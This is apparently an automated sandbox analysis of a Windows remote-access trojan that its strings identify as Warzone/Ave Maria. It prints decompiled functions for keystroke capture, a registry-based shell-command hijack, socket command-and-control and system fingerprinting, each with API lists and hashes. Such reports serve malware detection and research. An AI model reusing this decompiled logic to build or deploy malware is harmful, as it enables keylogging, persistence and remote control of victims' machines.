                                  				 *0x55a820 = 0;
                                  				asm("movups [0x55a84c], xmm0");
                                  				 *0x55a830 = 0;
                                  				_t19 = LoadLibraryW(L"User32.dll");
                                  				_push(0x55a834);
                                  				 *0x55a824 = E00411E88(_t4, "GetRawInputData", 0);
                                  				 *0x55a82c = E00411E88(_t19, "ToUnicode", 0);
                                  				 *0x55a828 = E00411E88(_t19, "MapVirtualKeyA", 0);
                                  				return 0x559de0;
                                  			}

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(0055A808,?,00401251), ref: 00409138
                                  • LoadLibraryW.KERNEL32(User32.dll,?,00401251), ref: 00409163
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                  • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                  • API String ID: 4274177235-2474467583
                                  • Opcode ID: 722d443ab0ccf9adfafb109646b35116b9ee6f38e4403bfd207fed41f56d27f2
                                  • Instruction ID: d1db26310c3b7d33376476d0bb5eea29622b7161c180695f05f3ce86934a789e
                                  • Opcode Fuzzy Hash: 722d443ab0ccf9adfafb109646b35116b9ee6f38e4403bfd207fed41f56d27f2
                                  • Instruction Fuzzy Hash: 980144B16643504B8700AB697C255693EF1FB9D702310832FE90497360E73809CBDB8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E00412E2C(void* __ecx, char* _a4, CHAR* _a8) {
                                  				void* _v8;
                                  				long _t9;
                                  				int _t12;
                                  				int _t15;
                                  				long _t16;
                                  
                                  				_t15 = lstrlenA(_a8);
                                  				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
                                  				if(_t9 == 0) {
                                  					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
                                  					RegCloseKey(_v8);
                                  					if(_t16 == 0) {
                                  						_t12 = 1;
                                  					} else {
                                  						_push(_t16);
                                  						goto L2;
                                  					}
                                  				} else {
                                  					_push(_t9);
                                  					L2:
                                  					SetLastError();
                                  					_t12 = 0;
                                  				}
                                  				return _t12;
                                  			}

                                  APIs
                                  • lstrlenA.KERNEL32(004131BE,00418FE6,?,?,004131BE,00418FE6,?), ref: 00412E34
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,004131BE,00418FE6,?), ref: 00412E51
                                  • SetLastError.KERNEL32(00000000,?,?,004131BE,00418FE6,?), ref: 00412E5C
                                  • RegSetValueExA.ADVAPI32(?,00418FE6,00000000,00000001,004131BE,00000000,?,?,004131BE,00418FE6,?), ref: 00412E74
                                  • RegCloseKey.ADVAPI32(?,?,?,004131BE,00418FE6,?), ref: 00412E7F
                                  Strings
                                  • Software\Classes\Folder\shell\open\command, xrefs: 00412E47
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseErrorLastOpenValuelstrlen
                                  • String ID: Software\Classes\Folder\shell\open\command
                                  • API String ID: 1613093083-2536721355
                                  • Opcode ID: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                  • Instruction ID: ffd4354489f07140ccd769c490119bd97119082caabcfac067ebab19d0d729b9
                                  • Opcode Fuzzy Hash: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                  • Instruction Fuzzy Hash: 0BF0CD35540318BBDF211FA09D09FDB3F79AB09790F108160F902A6160C2B58A61ABA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0040F238(intOrPtr _a4) {
                                  				intOrPtr* _t2;
                                  				_Unknown_base(*)()* _t8;
                                  				struct HINSTANCE__* _t10;
                                  
                                  				_t2 =  *0x55adb8;
                                  				if(_t2 == 0) {
                                  					L2:
                                  					_t10 = GetModuleHandleW(L"ntdll.dll");
                                  					 *0x55adb8 = GetProcAddress(_t10, "RtlNtStatusToDosError");
                                  					_t8 = GetProcAddress(_t10, "RtlSetLastWin32Error");
                                  					_t2 =  *0x55adb8;
                                  					 *0x55ad94 = _t8;
                                  				} else {
                                  					_t8 =  *0x55ad94;
                                  					if(_t8 == 0) {
                                  						goto L2;
                                  					}
                                  				}
                                  				if(_t2 != 0 && _t8 != 0) {
                                  					return  *0x55ad94( *_t2(_a4));
                                  				}
                                  				return _t2;
                                  			}

                                  APIs
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,0040FC57,00000000), ref: 0040F254
                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError,?,0040FC57,00000000), ref: 0040F262
                                  • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error,?,0040FC57,00000000), ref: 0040F273
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                  • API String ID: 667068680-2897241497
                                  • Opcode ID: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                  • Instruction ID: fa32091ee75a1baed7f6170c370dd1564c17c489402f95e3a669c5805b8ffe79
                                  • Opcode Fuzzy Hash: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                  • Instruction Fuzzy Hash: F6F0B4342443005FDB106F64FC289BA3BB8AE94B53300013EF806D3B60DB79DC499A19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0040594B(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
                                  				signed int _v8;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				void _v40;
                                  				void* _t36;
                                  				signed int _t40;
                                  				signed int _t42;
                                  				void* _t44;
                                  				signed int _t47;
                                  				intOrPtr _t53;
                                  				intOrPtr _t54;
                                  				signed int* _t55;
                                  
                                  				_v8 = _v8 & 0x00000000;
                                  				_t44 = __ecx;
                                  				E00403237(__ecx,  &_a4);
                                  				 *((intOrPtr*)(_t44 + 4)) = _a8;
                                  				E0041178E(_t44 + 0x1d8);
                                  				_t47 = 8;
                                  				memset( &_v40, 0, _t47 << 2);
                                  				_v28 = 6;
                                  				_t36 =  &_v40;
                                  				_t53 = 1;
                                  				_v32 = 1;
                                  				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
                                  				if(_t36 != 0) {
                                  					L4:
                                  					_t53 = 0;
                                  				} else {
                                  					_t54 =  *((intOrPtr*)(_v8 + 0x18));
                                  					_t40 = 2;
                                  					__imp__#23(_t40, 1, 0);
                                  					 *(_t44 + 0xc) = _t40;
                                  					if(_t40 == 0xffffffff) {
                                  						goto L4;
                                  					} else {
                                  						_t55 = _t44 + 0x1c8;
                                  						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
                                  						_t42 = 2;
                                  						 *_t55 = _t42;
                                  						__imp__#9(_a8);
                                  						 *(_t44 + 0x1ca) = _t42;
                                  						__imp__freeaddrinfo(_v8);
                                  						__imp__#4( *(_t44 + 0xc), _t55, 0x10);
                                  						if(_t42 != 0xffffffff) {
                                  							 *((intOrPtr*)(_t44 + 8)) = 1;
                                  							ReleaseMutex( *(_t44 + 0x1d8));
                                  						} else {
                                  							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
                                  							goto L4;
                                  						}
                                  					}
                                  				}
                                  				E00405FEB(_a4);
                                  				return _t53;
                                  			}

                                  APIs
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 0041178E: WaitForSingleObject.KERNEL32(?,000000FF,00405974,74A313FB,?,?,00000000,00404FB9,?,?,?,?,?,00000000,74A313FB), ref: 00411792
                                  • getaddrinfo.WS2_32(74A313FB,00000000,00404FB9,00000000), ref: 00405998
                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                  • htons.WS2_32(00000000), ref: 004059D5
                                  • freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                  • connect.WS2_32(?,?,00000010), ref: 004059F1
                                  • ReleaseMutex.KERNEL32(?), ref: 00405A1B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                  • String ID:
                                  • API String ID: 2516106447-0
                                  • Opcode ID: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                  • Instruction ID: 9847916f8b98b7b597607d954632222e8a2bcfa95c272735c2b26949272ee6fd
                                  • Opcode Fuzzy Hash: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                  • Instruction Fuzzy Hash: DD219C71A00208ABDF10DF65CC88BDA7BB9EF44324F10856AFD19EB2A1D7359A41DF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0040C30D(WCHAR* __ecx, void** __edx, long* _a4) {
                                  				void** _v8;
                                  				long _v12;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				long* _t14;
                                  				long _t16;
                                  				void* _t17;
                                  				long* _t24;
                                  				void* _t32;
                                  				struct _OVERLAPPED* _t34;
                                  				void* _t36;
                                  
                                  				_t34 = 0;
                                  				_v8 = __edx;
                                  				_t36 =  *0x42696c - _t34; // 0x0
                                  				if(_t36 == 0) {
                                  					_t32 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0, 0);
                                  					if(_t32 != 0 && _t32 != 0xffffffff) {
                                  						_t14 =  &_v20;
                                  						__imp__GetFileSizeEx(_t32, _t14);
                                  						if(_t14 != 0 && _v16 == 0) {
                                  							_t16 = _v20;
                                  							_t24 = _a4;
                                  							 *_t24 = _t16;
                                  							_t17 = LocalAlloc(0x40, _t16);
                                  							 *_v8 = _t17;
                                  							if(_t17 != 0) {
                                  								if(ReadFile(_t32, _t17,  *_t24,  &_v12, 0) == 0 ||  *_t24 != _v12) {
                                  									LocalFree( *_v8);
                                  								} else {
                                  									_t34 = 1;
                                  								}
                                  							}
                                  						}
                                  						CloseHandle(_t32);
                                  					}
                                  				} else {
                                  					_t34 = E0040C3B9(__ecx, __edx, _a4);
                                  				}
                                  				return _t34;
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C341
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 0040C357
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040C372
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040C38A
                                  • CloseHandle.KERNEL32(00000000), ref: 0040C3AD
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                    • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                    • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 4225742195-0
                                  • Opcode ID: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                  • Instruction ID: 02c412f26371b87ae011b2f5e9937fc2d134ed4a40de9b12e1d11bca91295adc
                                  • Opcode Fuzzy Hash: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                  • Instruction Fuzzy Hash: 3D119371610214EBCB219B65DC84AAF7BB8EF49750B10827AFD01E6290D7389D01CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0040577F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v36;
                                  				char _v44;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v65600;
                                  				void* _t47;
                                  				char* _t54;
                                  				intOrPtr _t79;
                                  				void* _t85;
                                  				void* _t88;
                                  				void* _t89;
                                  				void* _t114;
                                  				char* _t115;
                                  				char _t117;
                                  				void* _t118;
                                  				void* _t119;
                                  				void* _t120;
                                  
                                  				_t114 = __edx;
                                  				_t89 = __ecx;
                                  				_t47 = E004011C0(0x10040, __ecx);
                                  				_t88 = _t89;
                                  				if( *((intOrPtr*)(_t88 + 0xc)) != 0xffffffff) {
                                  					_v28 = 0xea60;
                                  					__imp__#21( *((intOrPtr*)(_t88 + 0xc)), 0xffff, 0x1006,  &_v28, 4);
                                  					_t117 = 0;
                                  					E00401052( &_v65600, 0, 0xffff);
                                  					_t120 = _t119 + 0xc;
                                  					_v60 = 0;
                                  					_v56 = 0;
                                  					E00403115( &_v52, _t114, E004034D1( &_v12, "warzoneTURBO"));
                                  					E00405FEB(_v12);
                                  					_v24 = 0;
                                  					_v20 = 0;
                                  					while(1) {
                                  						_t54 =  &_v65600;
                                  						__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t54, 0xc, _t117);
                                  						_t115 = _t54;
                                  						if(_t115 != 0xc) {
                                  							goto L8;
                                  						}
                                  						_v16 = _t117;
                                  						_t106 =  &_v16;
                                  						_v12 = _t117;
                                  						E004030CC( &_v16,  &_v65600, _t54);
                                  						_t107 = _t120;
                                  						E0040315E(_t120,  &_v16);
                                  						E0040315E(_t120,  &_v52);
                                  						E004061F0( &_v44, _t114, _t120, _t107,  &_v16, _t106);
                                  						_t120 = _t120 + 0x10;
                                  						_t79 =  *((intOrPtr*)(_v44 + 4));
                                  						_t118 = _t79 + 0xc;
                                  						if(_t79 == 0 || _t118 == _t115) {
                                  							L7:
                                  							E00403148( &_v44);
                                  							E00403148( &_v16);
                                  							L9:
                                  							_t96 =  &_v24;
                                  							E004030CC( &_v24,  &_v65600, _t115);
                                  							_t97 = _t120;
                                  							E0040315E(_t120,  &_v24);
                                  							E0040315E(_t120,  &_v52);
                                  							E004061F0( &_v36, _t114, _t120, _t97,  &_v24, _t96);
                                  							_t120 = _t120 + 0x10;
                                  							E004030FE(_t88 + 0x10);
                                  							E004030CC(_t88 + 0x10, _v36, _t115);
                                  							E004030FE( &_v24);
                                  							E004030FE( &_v36);
                                  							E0040507E(_t88, _t114, _a4);
                                  							E00403148( &_v36);
                                  							if(_t115 <= 0) {
                                  								goto L12;
                                  							}
                                  							_t117 = 0;
                                  							continue;
                                  						} else {
                                  							while(1) {
                                  								_t85 =  &_v65600 + _t115;
                                  								__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t85, _t118 - _t115, 0);
                                  								if(_t85 == 0xffffffff) {
                                  									break;
                                  								}
                                  								_t115 = _t115 + _t85;
                                  								if(_t118 != _t115) {
                                  									continue;
                                  								}
                                  								goto L7;
                                  							}
                                  							E00403148( &_v44);
                                  							E00403148( &_v16);
                                  							L12:
                                  							E00403148( &_v24);
                                  							E00403148( &_v52);
                                  							return E00403148( &_v60);
                                  						}
                                  						L8:
                                  						if(_t115 == 0xffffffff) {
                                  							goto L12;
                                  						}
                                  						goto L9;
                                  					}
                                  				}
                                  				return _t47;
			}

                                  0x0040577f
                                  0x0040577f
                                  0x00405787
                                  0x0040578d
                                  0x00405795
                                  0x004057a0
                                  0x004057b6
                                  0x004057bd
                                  0x004057c7
                                  0x004057cc
                                  0x004057cf
                                  0x004057d5
                                  0x004057e6
                                  0x004057ee
                                  0x004057f3
                                  0x004057f6
                                  0x004057f9
                                  0x004057fc
                                  0x00405806
                                  0x0040580c
                                  0x00405811
                                  0x00000000
                                  0x00000000
                                  0x0040581e
                                  0x00405822
                                  0x00405825
                                  0x00405828
                                  0x00405832
                                  0x00405835
                                  0x00405842
                                  0x0040584a
                                  0x00405852
                                  0x00405855
                                  0x00405858
                                  0x0040585d
                                  0x0040588b
                                  0x0040588e
                                  0x00405896
                                  0x004058a6
                                  0x004058ae
                                  0x004058b1
                                  0x004058bb
                                  0x004058be
                                  0x004058cb
                                  0x004058d3
                                  0x004058d8
                                  0x004058de
                                  0x004058ea
                                  0x004058f2
                                  0x004058fa
                                  0x00405904
                                  0x0040590c
                                  0x00405913
                                  0x00000000
                                  0x00000000
                                  0x00405915
                                  0x00000000
                                  0x00405863
                                  0x00405863
                                  0x00405870
                                  0x00405876
                                  0x0040587f
                                  0x00000000
                                  0x00000000
                                  0x00405885
                                  0x00405889
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405889
                                  0x0040591f
                                  0x00405927
                                  0x0040592c
                                  0x0040592f
                                  0x00405937
                                  0x00000000
                                  0x0040593f
                                  0x0040589d
                                  0x004058a0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004058a0
                                  0x004057f9
                                  0x00405948

                                  APIs
                                  • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                  • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                  • String ID: `$warzoneTURBO
                                  • API String ID: 3973575906-3455775371
                                  • Opcode ID: a486f593b1c2fc96c34f78f1041c930cda7c6560ca54a487b91204276bde7ff6
                                  • Instruction ID: 35ac9e55f98b3bce9837d823b4f88ae1208dbfd8d39d165d9c06c2cd8671669a
                                  • Opcode Fuzzy Hash: a486f593b1c2fc96c34f78f1041c930cda7c6560ca54a487b91204276bde7ff6
                                  • Instruction Fuzzy Hash: 06516E71910118AACB15FF62CC86CEFBB3CEF48755B00417AF815B61D2EA385B45CAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00402E27(char __ecx, void* __edx, void* __eflags) {
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v76;
                                  				char _v344;
                                  				short _v864;
                                  				void* __edi;
                                  				void* _t28;
                                  				void* _t32;
                                  				void* _t35;
                                  				void* _t36;
                                  				void* _t37;
                                  				char _t54;
                                  				void* _t75;
                                  				void* _t76;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t84;
                                  
                                  				_t84 = __eflags;
                                  				_t54 = __ecx;
                                  				_t76 = __edx;
                                  				E00410D2D(E00410E5E( &_v24, __edx),  &_v20);
                                  				GetModuleFileNameA(0,  &_v344, 0x104);
                                  				_v16 = 0;
                                  				_t28 = E004134A2( &_v344,  &_v16);
                                  				_v12 = 0;
                                  				E00413279(_t28, _v16, 0x10ad,  &_v12);
                                  				_t82 = _t81 + 4;
                                  				E004036F7(_t82, _v20);
                                  				E004036F7(_t82, _v24);
                                  				_t32 = E00410F3E();
                                  				E004036F7(_t82, 0x417668);
                                  				_t64 = _t82;
                                  				E0041119D(_t82);
                                  				_t35 = E00411177(_t82);
                                  				_t36 = E0041111B();
                                  				_t37 = E00410F61();
                                  				E004111D7(_t82, _v16);
                                  				E00405044(_t54, E0040430E( &_v76, _v16, _t84, _t82, _t64, 0x10e, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
                                  				E004042CC( &_v76, _t76);
                                  				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
                                  					E00401052( &_v864, 0, 0x208);
                                  					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
                                  					lstrcatW( &_v864, L"\\Microsoft Vision\\");
                                  					CreateDirectoryW( &_v864, 0);
                                  					E0040906F(_t54, 1);
                                  					_v12 = 0x41a8b0;
                                  					E00405044(_t54,  &_v12);
                                  				}
                                  				E00405FEB(_v20);
                                  				return E00405FEB(_v24);
			}

                                  0x00402e27
                                  0x00402e32
                                  0x00402e38
                                  0x00402e42
                                  0x00402e56
                                  0x00402e5f
                                  0x00402e68
                                  0x00402e7b
                                  0x00402e7e
                                  0x00402e86
                                  0x00402e8e
                                  0x00402e97
                                  0x00402e9c
                                  0x00402ead
                                  0x00402eb3
                                  0x00402eb5
                                  0x00402eba
                                  0x00402ec0
                                  0x00402ec6
                                  0x00402ed5
                                  0x00402ee5
                                  0x00402eed
                                  0x00402ef7
                                  0x00402f06
                                  0x00402f1a
                                  0x00402f2c
                                  0x00402f3a
                                  0x00402f43
                                  0x00402f4b
                                  0x00402f55
                                  0x00402f55
                                  0x00402f5d
                                  0x00402f6e

                                  APIs
                                    • Part of subcall function 00410D2D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                    • Part of subcall function 00410D2D: CoInitialize.OLE32(00000000), ref: 00410D4B
                                    • Part of subcall function 00410D2D: CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?), ref: 00410D69
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E56
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00410F3E: GlobalMemoryStatusEx.KERNEL32(?), ref: 00410F4F
                                    • Part of subcall function 0041119D: GetComputerNameW.KERNEL32 ref: 004111C0
                                    • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                    • Part of subcall function 00410F61: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                    • Part of subcall function 00410F61: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                    • Part of subcall function 004111D7: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00402F1A
                                  • lstrcatW.KERNEL32 ref: 00402F2C
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402F3A
                                    • Part of subcall function 0040906F: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                    • Part of subcall function 0040906F: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                    • Part of subcall function 0040906F: EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                    • Part of subcall function 0040906F: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                    • Part of subcall function 0040906F: LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                  • String ID: \Microsoft Vision\
                                  • API String ID: 1987359387-1618823865
                                  • Opcode ID: c8175ba5bba8b39de2ed917726930458d72d9ec0ecf5b7918431273851232b1e
                                  • Instruction ID: 851052fb16c6d29596c0b523666286a16417f9887d42e77abec1e0ca40aba6c7
                                  • Opcode Fuzzy Hash: c8175ba5bba8b39de2ed917726930458d72d9ec0ecf5b7918431273851232b1e
                                  • Instruction Fuzzy Hash: 56318571A005197BCF14FBA2DC46DEEB77CAF44308F00046EB205B21D1DA7C5A858B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00412049(void* __ecx, void* __eflags) {
                                  				void* _v8;
                                  				char _v12;
                                  				char _v16;
                                  				intOrPtr _v40;
                                  				char _v44;
                                  				void* _t15;
                                  				intOrPtr* _t16;
                                  				intOrPtr _t34;
                                  				void* _t45;
                                  
                                  				_t45 = __eflags;
                                  				_t15 = E00411E6D();
                                  				_push(__ecx);
                                  				_t16 = E00411E88(_t15, "VirtualQuery", _t45);
                                  				if(_t16 != 0) {
                                  					_t16 =  *_t16(E00412049,  &_v44, 0x1c);
                                  					_t34 = _v40;
                                  					_t47 = _t34;
                                  					if(_t34 != 0) {
                                  						E00411CE3(_t34, _t47);
                                  						MessageBoxA(0, "Bla2", "Bla2", 0);
                                  						_push(_t34);
                                  						_v12 = 0;
                                  						E004120F8( &_v16, _t47, E004036F7( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
                                  						E00405FEB(_v8);
                                  						_v8 = 0;
                                  						E00405FEB(0);
                                  						_push(0);
                                  						_v12 = 0;
                                  						E004120F8( &_v16, _t47, E004036F7( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
                                  						E00405FEB(_v8);
                                  						_v8 = 0;
                                  						return E00405FEB(0);
                                  					}
                                  				}
                                  				return _t16;
			}

                                  0x00412049
                                  0x00412050
                                  0x00412055
                                  0x0041205d
                                  0x00412065
                                  0x00412076
                                  0x00412078
                                  0x0041207b
                                  0x0041207d
                                  0x0041207f
                                  0x0041208f
                                  0x00412095
                                  0x00412099
                                  0x004120ae
                                  0x004120b6
                                  0x004120bd
                                  0x004120c0
                                  0x004120c5
                                  0x004120c9
                                  0x004120de
                                  0x004120e6
                                  0x004120ed
                                  0x00000000
                                  0x004120f0
                                  0x0041207d
                                  0x004120f7

                                  APIs
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  • MessageBoxA.USER32 ref: 0041208F
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 004120F8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  • VirtualQuery, xrefs: 00412056
                                  • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0041209D
